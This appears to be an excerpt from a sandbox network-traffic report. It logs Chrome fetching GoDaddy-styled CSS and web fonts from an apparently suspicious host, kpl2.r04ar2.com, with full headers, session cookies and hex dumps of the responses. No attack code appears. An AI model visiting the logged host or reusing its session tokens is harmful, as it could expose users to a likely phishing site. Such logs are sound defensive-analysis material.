                                                          2024-08-27 22:11:08 UTC1369INData Raw: 2d 62 6c 6f 63 6b 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 2e 32 35 72 65 6d 29 20 2a 20 35 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 66 6f 6e 74 2d 70 72 69 6d 61 72 79 2d 62 6f 6c 64 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 61 72 28 2d 2d 75 78 2d 31 30 36 37 70 68 39 2c 73 61 6e 73 2d 73 65 72 69 66 29 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 65 72 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75 74 74 6f 6e 3a 6e 6f 74 28 5b 68 72 65 66 5d 29 3e 2a 20 7b 0d 0a 20 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 20 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 0d 0a 23
                                                          Data Ascii: -block { padding: calc(var(--ux-1sbfig8,.25rem) * 5);}#sections_godaddy .font-primary-bold { font-family: var(--ux-1067ph9,sans-serif); font-weight: bolder;}#sections_godaddy .ux-button:not([href])>* { pointer-events: none;}#
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 34 68 76 6f 76 6e 2c 76 61 72 28 2d 2d 75 78 2d 31 78 6c 69 75 68 69 2c 74 72 61 6e 73 70 61 72 65 6e 74 29 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75 74 74 6f 6e 2e 75 78 2d 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75 74 74 6f 6e 2e 75 78 2d 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 3a 6e 6f 74 28 5b 64 69 73 61 62 6c 65 64 5d
                                                          Data Ascii: ; border-color: var(--ux-4hvovn,var(--ux-1xliuhi,transparent));}#sections_godaddy .ux-button.ux-button-primary { color: #fff; background-color: #000; border-color: #000;}#sections_godaddy .ux-button.ux-button-primary:not([disabled]
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 20 76 61 72 28 2d 2d 75 78 2d 6e 65 6f 75 79 6e 2c 76 61 72 28 2d 2d 75 78 2d 68 6d 31 74 79 37 2c 31 2e 35 29 29 3b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 61 72 28 2d 2d 75 78 2d 6f 35 39 31 79 6a 2c 76 61 72 28 2d 2d 75 78 2d 39 77 74 61 61 33 2c 73 61 6e 73 2d 73 65 72 69 66 29 29 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 76 61 72 28 2d 2d 75 78 2d 31 30 39 35 78 30 64 2c 76 61 72 28 2d 2d 75 78 2d 33 7a 36 63 63 64 2c 34 30 30 29 29 3b 0d 0a 20 20 66 6f 6e 74 2d 76 61 72 69 61 74 69 6f 6e 2d 73 65 74 74 69 6e 67 73 3a 20 76 61 72 28 2d 2d 75 78 2d 6a 31 33 38 78 38 2c 76 61 72 28 2d 2d 75 78 2d 65 37 32 37 74 38 2c 69 6e 68 65 72 69 74 29 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75
                                                          Data Ascii: var(--ux-neouyn,var(--ux-hm1ty7,1.5)); font-family: var(--ux-o591yj,var(--ux-9wtaa3,sans-serif)); font-weight: var(--ux-1095x0d,var(--ux-3z6ccd,400)); font-variation-settings: var(--ux-j138x8,var(--ux-e727t8,inherit));}#sections_godaddy .u


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          41192.168.2.449811188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:07 UTC1445OUTGET /rsudZieQRPg934N9fbuv40 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Origin: https://kpl2.r04ar2.com
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: font
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:08 UTC623INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:08 GMT
                                                          Content-Type: font/woff2
                                                          Content-Length: 28000
                                                          Connection: close
                                                          Content-Disposition: inline; filename="rsudZieQRPg934N9fbuv40"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ONaLF3T0yQb1pzt2%2FGxRrLtrVCapNe6cjBkzRvUnDOo%2BCYwMRCGK%2Fiy1Ap2kIc5ihw9Lw%2B6MNcCVoH7UxowmiQ3PyLsnyJqW3DApS7WEhH7%2FR7ZqA0S%2B0g9iQ6yoSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f65456e4bc402-EWR
                                                          2024-08-27 22:11:08 UTC746INData Raw: 77 4f 46 32 00 01 00 00 00 00 6d 60 00 10 00 00 00 01 24 08 00 00 6c fd 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 9d 36 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 bb 24 82 9c 7f 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 03 07 97 7b 0c 81 0d 5b 09 10 71 05 6b b7 5d 5d 4f 88 db 06 10 73 b3 fd a9 7c 99 02 6e 8c 9b c7 21 18 d6 5b 3c 3b 10 83 ee e0 50 26 a6 cf 67 ff ff ff bf 21 a9 c8 98 49 27 69 b7 0d 51 01 44 50 d5 df 9f c4 1e 39 02 92 4a a0 06 b7 80 17 c1 39 47 eb 95 e9 98 51 31 28 8b f2 29 4a 6e c6 19 d5 d4 c5 d4 38 59 f3 d2 1b f9 1a 98 29 4a ce 46 0e 63 20 41 96 af 37 6b ab 76 b3 8b e9 32 3d a1 5a ee 6e fa 34 60 12 ed 81 a0 c0 7e 4e 6c a4 81 ef 34 3b aa 91 07 53 f6 6c 7b 77 c7 c7 3a ae 23 d5 ee aa 3d 21 bc 20
                                                          Data Ascii: wOF2m`$lB6`<<b$6$x> {[qk]]Os|n![<;P&g!I'iQDP9J9GQ1()Jn8Y)JFc A7kv2=Zn4`~Nl4;Sl{w:#=!
                                                          2024-08-27 22:11:08 UTC1369INData Raw: db e5 9f fb 06 4b 68 b0 50 00 7c 22 4d 93 ae 4a 51 a6 00 02 1a e0 df 3f 60 01 fc 53 40 7b df ed 6f 97 f6 52 6a 43 45 a1 71 78 8f 70 92 21 28 57 69 9f a4 1b eb 64 59 b5 25 ff 2f 72 f2 23 13 70 04 e7 43 20 15 c4 93 e2 e9 00 00 81 82 83 f3 72 1e 6f 34 50 f1 7d e4 e6 7f 33 58 92 99 5d 88 fc f3 a2 d4 ae 01 36 f2 9e 27 7e 26 b0 d3 c0 5d b7 b4 a7 2a 79 09 f4 8f b6 ff 59 51 82 a7 39 e1 22 76 b7 c3 17 cb 33 f0 af 90 a0 d9 6f 45 4d 51 6f 57 4d 16 57 60 cc 85 de 1f 9a 8a 01 13 c4 07 db cc a4 0e 94 94 10 82 59 08 56 81 8a 4f 32 11 7f ee f1 f8 f4 6c 83 02 c7 ac 9d 70 01 31 87 f4 42 a5 c2 bf 46 6e 0e 7f 6f 10 3c d0 ab a8 2c 43 8f f7 0f fd 97 f8 5e c0 59 e6 43 00 b6 fe 57 ae e9 b6 74 58 e2 11 7c a8 60 d2 a6 bc 97 35 3a f7 59 64 40 5d e5 12 6a 18 bb 24 b6 dc ca 76 b6 2a
                                                          Data Ascii: KhP|"MJQ?`S@{oRjCEqxp!(WidY%/r#pC ro4P}3X]6'~&]*yYQ9"v3oEMQoWMW`YVO2lp1BFno<,C^YCWtX|`5:Yd@]j$v*
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 4a ad 68 65 68 64 9a cf 32 9d 4d e7 8a 0a 96 48 c8 6c 22 d8 b5 a2 1b ed 62 bc b1 36 52 21 05 95 14 c7 81 94 35 dc bc 61 7e c1 b4 7a 90 11 b4 ca 1d 10 b9 22 0a 08 40 c0 9b 31 90 dc 27 05 17 40 40 05 00 50 85 55 b6 46 4e 76 17 a1 cf f8 91 28 18 bc 86 dd 28 8a 0d 6e 1d 26 6e 7d 95 e8 90 58 8c 91 02 38 4a a0 94 87 e5 5a 50 e2 4c bc d0 25 06 2b 80 8c c4 05 99 9c 71 86 d8 29 ca 83 fb a6 88 8f df 77 45 f5 08 aa 72 b3 dd 04 90 49 e7 01 a0 73 40 15 14 14 29 cb f1 82 58 04 82 31 5a 02 29 dc 92 31 91 53 51 02 a6 fa 29 2a 80 d8 45 b8 e5 49 0f 90 d8 00 4a f9 09 a8 6e 75 4c 81 89 2f 00 77 7d b0 d2 75 b4 ea 9a ae 67 98 3e 3c 14 be 13 55 48 55 f9 1e 60 2e ed fc 69 cf da b5 42 06 20 96 20 07 60 a8 05 c2 4c f9 e3 9b e0 38 ab d1 83 9b 3a 8b 85 5e ca a3 dc 75 85 2b e0 30 ac
                                                          Data Ascii: Jhehd2MHl"b6R!5a~z"@1'@@PUFNv((n&n}X8JZPL%+q)wErIs@)X1Z)1SQ)*EIJnuL/w}ug><UHU`.iB `L8:^u+0
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 8d 21 bc 9b c0 9e 39 aa 76 68 dd 8c 5b 2f 6b 9f 1d b3 c9 cf 85 80 7e 4d 7d 1c 44 b5 56 8e d5 c6 7d 25 c4 02 3b 1b 15 6b 50 8d 7e cb ba 24 26 a5 bb 63 d1 11 53 27 2b df 09 8c 31 2c f4 05 2d 8e 9d 58 08 42 45 de 45 e3 4e a2 83 07 5d cd 4a 33 e0 b5 97 e1 ae c5 ad d6 f0 84 e2 b0 3c c6 03 e7 41 3f 7a 78 70 cc 8c 76 2e 02 cf b0 85 b1 bb 8b 6f c8 80 02 d5 9e 4a 0a a0 e3 4b b7 9b 9f c2 a6 10 af 98 9a 67 7a 8f e4 ad 45 d1 58 cc 2e ad 55 97 e2 39 c3 32 ea cd 24 ff 27 7b 73 5b b5 87 25 e3 73 aa 4d 39 f0 18 1c e6 1b 82 af d3 ba d2 3c 76 ce 79 bf b0 50 9d c3 58 69 34 3f af 43 4d 37 3b 6c 0d ce 6f 77 95 ec 53 d8 54 86 b1 6d 91 2a 74 76 a0 4a b1 bf 18 8f 94 7e cf d7 cf f4 a0 5e 55 14 0e 79 da 72 32 2d 41 57 0e 69 b4 3f 77 7c c5 7f e3 8f 3f 86 9b ff 3b dd 9e 48 b6 50 f6
                                                          Data Ascii: !9vh[/k~M}DV}%;kP~$&cS'+1,-XBEEN]J3<A?zxpv.oJKgzEX.U92$'{s[%sM9<vyPXi4?CM7;lowSTm*tvJ~^Uyr2-AWi?w|?;HP
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 99 80 54 9b eb 9f 00 6a 07 4d d1 ff 28 8b fc 6c d2 51 9d 0e 83 9d 22 5c e7 48 fc 92 05 99 2d cc c3 68 90 eb c1 5c 1c b1 24 18 71 2e 08 a3 6c db c7 5b cb 58 47 63 ba 7c 3d 91 9d bf 11 44 11 fd a1 6b 70 7b ee c6 de 50 49 44 db ef aa dc 2c 43 d6 77 cc 1f aa ac 43 7b cb 87 68 e6 c2 24 ef 71 39 38 ea ca 50 a1 dd a1 b9 16 af e7 5b 36 1a a3 68 7d b7 d1 9b 19 9e 1c 5e da b3 75 d6 19 24 b3 60 d0 95 e7 b7 0d b0 2c 6e a1 9e a0 81 cf 5d 0e 63 53 f1 46 00 2f bb fe 1f 70 a5 9e 58 1d 8b e9 75 3b 36 ba 42 6c 18 29 19 db c5 7e 29 4e 35 47 ef 03 d3 11 c4 6b cc 5c b2 8c 98 87 f1 b4 13 7a 4a eb 68 53 1d d1 cd 11 38 50 f8 a2 27 ad a6 67 78 4b 59 17 a6 07 71 e0 18 1c 10 0b 1d 4d 5f a1 68 c3 41 66 ce 84 77 dd 8c a7 e9 0d 2d 3e d3 90 90 f7 e2 a7 6d b2 50 7a fd 83 9e 09 59 ba 40
                                                          Data Ascii: TjM(lQ"\H-h\$q.l[XGc|=Dkp{PID,CwC{h$q98P[6h}^u$`,n]cSF/pXu;6Bl)~)N5Gk\zJhS8P'gxKYqM_hAfw->mPzY@
                                                          2024-08-27 22:11:08 UTC1369INData Raw: c8 e7 ed 03 c0 64 f5 67 15 d4 4b a0 1c 83 ae 60 ec ae 01 51 24 52 a8 17 ec d7 e5 02 86 d6 f7 93 a3 02 4c fd 08 2e 8c 51 67 00 58 f0 b7 dd 29 00 ab bc b1 63 95 3a c0 e5 1b 8e 84 eb 18 37 bb ef 5b d7 78 fc 7d eb 19 6f bf 0f 7d 63 b3 00 00 20 24 28 4c 1c 20 c3 ee 31 20 a1 ae 01 e7 67 65 60 3c ab 00 96 58 09 ac 4a bb 44 03 43 dd 38 d9 f3 a2 2b cd a5 b3 5c 2d 6b ac c0 93 b0 6f fd 3a 04 fd 22 2e c2 be 55 37 a0 58 93 20 c4 cf 40 e9 fe 01 ff a3 bf 02 54 df f1 8b 37 d2 18 b9 b2 03 8d 66 21 96 60 25 57 88 a6 3f f3 e8 ee 9c 1a f8 ec 5f 95 a3 57 af 34 dc c0 f6 14 72 54 dc 81 7e 73 3e 7a 37 c6 fa dd 84 b2 82 b7 a0 7a 70 7b fd bf 42 d0 4f eb 28 a4 30 55 01 23 24 61 8a 97 2a 35 0e da f7 f4 cd 10 22 2c 42 aa 28 31 81 9a 39 89 24 32 0a 29 54 d2 64 c9 91 a7 40 89 a2 74 11
                                                          Data Ascii: dgK`Q$RL.QgX)c:7[x}o}c $(L 1 ge`<XJDC8+\-ko:".U7X @T7f!`%W?_W4rT~s>z7zp{BO(0U#$a*5",B(19$2)Td@t
                                                          2024-08-27 22:11:08 UTC1369INData Raw: b3 6d 8b 0c 04 3f 40 60 4f 3c e0 20 be 10 e4 01 3d a8 7d a6 28 9b 38 a1 c5 64 57 74 3d ec 7f 7d 08 26 bd 16 95 ea 5b 16 b0 5d d2 de b5 6e b9 e3 ae 7b 6e 6b 72 28 f0 1d 1b 15 eb 74 db 4d 9d ae bb 2f 4e a5 f6 c0 61 4c 1d c7 6e b4 0c 4d bd 43 5d 9c ee 65 37 b8 ea ff 8d 8b ca 96 bb eb 56 d5 5a 4d 90 d4 e4 b5 76 87 e4 8d 45 7d 9a 48 7b 15 e0 5a c2 73 b4 ee 2e be 04 f8 b4 7e c7 da 3d f4 f5 ed 7a 5a 3f ac 25 b2 36 32 5a f6 5f c0 4a 1d ff a4 c9 f4 bf f6 4f f8 3a c0 5c 92 fa 51 9c be bf bc 3e 88 6f 28 0a 9c e4 45 91 5e ff 83 f9 e0 35 e2 f6 53 a6 99 64 a7 9e 68 3c 39 c1 74 f8 af 2d f4 6b e8 e9 d0 0e 42 8c e0 02 a8 36 9f 40 50 6b 72 08 44 df 89 c3 a0 23 f1 be 82 8f 9f a6 6c c8 ea e2 70 81 d8 e7 08 a7 65 e7 73 8e 16 c3 78 1e d8 5f dd 27 48 e7 20 ba 7f 9a bb 53 d4 32
                                                          Data Ascii: m?@`O< =}(8dWt=}&[]n{nkr(tM/NaLnMC]e7VZMvE}H{Zs.~=zZ?%62Z_JO:\Q>o(E^5Sdh<9t-kB6@PkrD#lpesx_'H S2
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 53 bf e2 c7 1c f6 cf 7b e2 5f aa f0 6f 0a fc 99 a3 fe 7b 4f fc 4f 15 fe 4f f1 7a c1 4f 5d c3 5e e8 fa 49 b7 d0 0e 70 d3 ad 1f fb c9 d3 33 05 10 1c 9c 8f f4 d8 f9 ab 65 5f 2e 9e fa 31 5c 0f 80 47 2e 03 e8 af 1b ab 78 90 19 8c 5c 3d 16 50 9e 10 aa b7 bb f1 96 e9 e8 50 5a 57 99 89 cb 42 8c 4f a5 c6 83 b0 72 71 d2 e9 5c 2c 8d e9 08 ac 4c 5d e9 e1 2a 2c 52 ba 08 9f 4a 8e 07 a1 28 86 32 a7 dd c8 b8 a8 8b 07 a7 74 ba 73 43 a8 e0 ea ca f2 67 58 b7 fe e2 8b 5d 0d dd c5 61 5a 55 59 9a 0f cd a5 7c b3 55 ed 6b 08 d9 3e 2e e8 14 eb a1 c6 2d 23 31 06 d3 5c 07 73 91 a5 48 f6 10 c2 65 09 59 44 d5 32 9e c2 c0 67 88 49 29 63 f6 60 86 66 ae f7 aa d0 58 94 7c 06 f4 ab 58 8e d0 72 36 8b 19 fb d1 96 1d 44 50 d7 90 6d 47 b6 20 cc 83 76 4d b5 21 b9 79 ec 7d 89 41 6e 78 78 e8 81
                                                          Data Ascii: S{_o{OOOzO]^Ip3e_.1\G.x\=PPZWBOrq\,L]*,RJ(2tsCgX]aZUY|Uk>.-#1\sHeYD2gI)c`fX|Xr6DPmG vM!y}Anxx
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 2e 4d eb 35 d1 e1 80 1c 69 5d bf cc a1 e8 ac ef 3b f9 0a 24 ed 13 15 ac 4d 28 6d ea 7c 96 81 ad 6b 76 cb f2 ea 9a 98 e8 b3 84 7a ce d7 ad d3 1a f7 5d b8 96 7f e0 ef fb 3e d2 ff 10 71 be 45 2d 8d b5 93 2a 9f 2a fe 87 98 cc f7 1a 0f e6 a6 af f9 2b 26 34 d7 d6 39 10 09 be 2e 9e f0 d4 8e 33 b4 8b 19 e5 a9 9d 73 66 58 9e dc dc f7 04 ae e0 53 fd d4 74 7f cd 9a 76 7c 53 74 7a b8 41 07 9a 43 e8 66 29 ea 9d 9e 9c 9f 60 5e dc a2 67 a2 89 2e 8a 3d 6a 11 03 df b2 c3 35 2d db bf 54 8e 2c e8 63 02 b6 b6 82 1f 1e 48 3c 04 3a 4d 54 d0 ba 1b 7f cf 00 55 2a 7c 3c 7a f7 c0 a9 d4 3c 3a e4 66 3e 91 cb 46 cd d4 3b 3d 5e 7c 75 77 09 fc 80 de 6b 83 b1 31 20 03 f7 52 5b 17 79 79 fc fa e3 c7 fe 67 66 0b 87 1e ce e4 67 4f 5f 86 a5 da ce f5 c1 0b 83 57 1e 81 d4 75 41 77 3a b7 59 8b
                                                          Data Ascii: .M5i];$M(m|kvz]>qE-**+&49.3sfXStv|StzACf)`^g.=j5-T,cH<:MTU*|<z<:f>F;=^|uwk1 R[yygfgO_WuAw:Y
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 07 e6 8f 03 0a 13 5b 7c 11 96 dd 39 50 c7 5c e8 b6 f3 ef e1 f8 f4 af 76 d7 04 6c a5 5b 5e a5 1f 82 e5 c8 48 75 02 05 a3 99 05 4b 0b cf 39 99 9b 44 e9 29 d2 4f e0 4d 76 5e eb d9 c9 2a 51 3c d3 98 aa 7e 11 1f 98 ae d2 2b d3 a4 f9 9a 0c b7 3d 84 70 b2 dd be ff 15 fd d3 ca ed c7 5a e4 3b 4f 4d 7e fe de f7 38 7c 59 78 f5 45 72 48 c9 b4 a5 47 d1 4f d6 15 62 27 b3 8b 70 d3 fa a2 3e a2 bc 65 ae 08 dd f4 4c 26 b8 0e bb 11 81 6e 8c ee b3 4e 29 73 93 b2 4d 47 db 14 36 f3 fd ef 69 4c 75 77 3d d1 4d 84 97 19 e8 a7 6b fe ff f9 e1 fa fd 4c a2 2c c7 1e 8d a7 96 3f 2a d7 8f 3f 1f 03 bf fd da ba fb e8 7b 75 c5 a3 0a fe 9a ef 16 b0 ec ef b4 ce b9 94 ed 47 9b 64 db 4f 4d ac 65 d4 fc 88 ba 28 3c ff 22 39 a2 6a b1 ac 41 de 47 d1 17 e3 ce e4 66 86 cf a8 ea 07 b9 46 7e 13 54 1d
                                                          Data Ascii: [|9P\vl[^HuK9D)OMv^*Q<~+=pZ;OM~8|YxErHGOb'p>eL&nN)sMG6iLuw=MkL,?*?{uGdOMe(<"9jAGfF~T


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          42192.168.2.449810188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:07 UTC1452OUTGET /12Vj5xeItpngol5p78GsRYKIFop50 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Origin: https://kpl2.r04ar2.com
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: font
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:08 UTC627INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:08 GMT
                                                          Content-Type: font/woff
                                                          Content-Length: 35970
                                                          Connection: close
                                                          Content-Disposition: inline; filename="12Vj5xeItpngol5p78GsRYKIFop50"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TfAdoPjezt9Qp1ShT68doiZlGRcYTc4MfcEctKJlG%2FweXOmOa%2FT9Xm9yEGFz8OnNCRq%2Fm1qJTfhLEUUeSMiYbrvVHiU%2FrxZoXmV%2BuSdVO9OeNE59dFebSh3lGN8jBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f65457ccd72a4-EWR
                                                          2024-08-27 22:11:08 UTC742INData Raw: 77 4f 46 46 00 01 00 00 00 00 8c 82 00 11 00 00 00 01 24 20 00 01 00 00 00 00 8b 5c 00 00 01 26 00 00 02 93 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8b 54 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 17 df 00 00 4e b6 ed 42 8f b9 47 53 55 42 00 00 19 60 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c 10 00 00 00 46 00 00 00 60 69 c3 7b 5b 63 6d 61 70 00 00 1c 58 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 84 dc 00 00 00 2f 00 00 00 3c 29 81 01 c0 66 70 67 6d 00 00 85 0c 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 84 d4 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 21 74 00 00 52 61 00 00 9d a4 24 e0 b2 69 68 65 61 64 00 00 73 d8 00 00 00 33 00 00 00 36 1b 16 7d b8 68 68 65 61 00 00 74 0c 00 00 00
                                                          Data Ascii: wOFF$ \&DSIGTGPOSNBGSUB`3yOS/2F`i{[cmapX<?+cvt /<)fpgm?gaspglyf!tRa$iheads36}hheat
                                                          2024-08-27 22:11:08 UTC1369INData Raw: a0 b7 e8 1d ca a7 02 da 41 45 b4 8b f6 d2 01 fa 90 4a e8 10 1d a6 06 6a e2 04 f6 b2 8f bb 71 26 5f c6 d7 f2 60 be 81 87 f0 50 be 91 87 f1 4d 3c 9c 6f e6 5b f8 56 1e c1 b7 f1 48 1e cb 53 78 3a cf e0 99 3c 8b 67 f3 1c 9e cb f3 78 3e 2f e0 85 bc 88 17 f3 12 5e ca cb 78 39 af e0 95 bc 8a 57 73 2e e7 f1 26 de ca 85 bc 93 8b 78 0f 17 13 f3 6a 55 4a a9 94 ae 42 d4 53 9d a7 1c 32 28 5f b5 d0 01 55 c7 d3 d5 51 9e a1 82 3c 87 e2 79 ae 6a e6 79 d8 e7 ab f3 bc 50 85 78 b1 3a c5 cb d0 b6 02 6d 2b b1 af 56 d5 fc 8a aa e5 35 68 5b 8b 7e 45 b8 57 4c dd e8 72 70 c0 07 1e f8 30 ea 19 2a 50 75 18 f9 24 4f 41 af e9 94 86 d1 b7 f1 4c 4a e1 59 e4 e5 d9 e4 e1 39 18 65 ae da 02 4c b5 c0 14 02 a6 20 2f 22 3f b0 6d e1 a5 94 08 8c 8d bc 1c bf 2b f0 cc 4a ec ab c8 00 e6 a3 9c ab 1a
                                                          Data Ascii: AEJjq&_`PM<o[VHSx:<gx>/^x9Ws.&xjUJBS2(_UQ<yjyPx:m+V5h[~EWLrp0*Pu$OALJY9eL /"?m+J
